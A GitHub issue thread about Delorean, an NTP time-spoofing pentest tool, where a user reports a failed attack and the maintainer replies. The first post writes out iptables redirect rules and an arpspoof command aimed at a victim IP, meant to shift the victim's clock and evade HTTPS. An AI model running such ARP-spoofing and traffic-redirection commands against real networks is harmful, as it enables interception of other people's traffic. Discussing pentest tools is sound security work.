### ISSUE TITLE
Victim WIthout Internet Connection

### ISSUE THREAD

**Issue by S12cybersecurity** [PentesterES/Delorean#8]
Steps:
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 10000
sudo iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 123 -j REDIRECT --to-port 123
sudo arpspoof -i wlan0 -t 192.168.0.131 192.168.0.1
sudo ./delorean.py

Result good, victim go to 2025, but don't have connection and i don't get a evasion of https.

Gracias

**Comment by S12cybersecurity** [comment]
Okey, sorry the issue is with arpspoof not delorean

**Comment by jselvi** [comment]
I'm closing the issue then. Thanks for your report anyway :)

**Comment by FayeWong98** [comment]
@S12cybersecurity 
Hello, I followed your steps, used arpspoof, and then executed delorean.py. 

As a result, the victim's time did not change and the correct time was still obtained. 

Can you help me analyze the problem? Thanks!

**Comment by jselvi** [comment]
Hey @FayeWong98, better if you create a new issue with your question, so other participants here are not continuously notified of new messages. Also because it's likely a different problem.

Please include in the new issue all the details about what you are doing. Your target OS, commands that you are using, and the output of the tool, if possible. I'm not actively using Delorean for some years, but I'll do my best to help you if I can.
